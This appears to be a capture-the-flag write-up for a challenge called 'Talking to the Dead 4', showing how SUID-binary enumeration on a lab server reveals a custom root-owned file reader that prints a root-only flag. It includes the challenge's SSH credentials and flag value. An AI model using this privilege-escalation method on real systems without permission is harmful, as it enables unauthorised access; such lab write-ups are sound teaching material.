Talking to the Dead 4

Challenge:

We suspect spookyboi doesn't use the root account for this server. There must be some mechanism used to read the flag4.txt file without gaining root. Submit the contents of flag4.txt from the remote machine.

ssh hacktober@env.hacktober.io Password: hacktober-Underdog-Truth-Glimpse

Solution:

First step was to locate the flag:

 find / -xdev -name "flag4.txt" 2>/dev/null
/root/flag4.txt

$ ls -l /root/flag4.txt 
-rw------- 1 root root 47 Oct  6 08:41 /root/flag4.txt

The flag is only readable by root so I need to find a method to elevate my privileges. I start by looking for binaries having "Set User ID" (SUID) permissions. The SUID permission allows users to execute a file with the permissions of a specified user. The find command can be used to search for files with SUID permissions, a.k.a "sticky bit":

$ find / -xdev -perm -u=s -type f 2>/dev/null

/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

The majority of the binaries are the expected OS utilities, except for /usr/local/bin/ouija. I check it's ownership and whether it has any help information.

$ ls -l /usr/local/bin/ouija

-rwsr-xr-x 1 root root 16856 Oct  6 10:49 /usr/local/bin/ouija

$ /usr/local/bin/ouija       

OUIJA 6.66 - Read files in the /root directory
Usage: ouija [FILENAME]
EXAMPLES:
	ouija file.txt
	ouija read.me

So the binary is basically a version of cat that will run with root permissions:

$ /usr/local/bin/ouija flag4.txt

flag{4781cbffd13df6622565d45e790b4aac2a4054dc}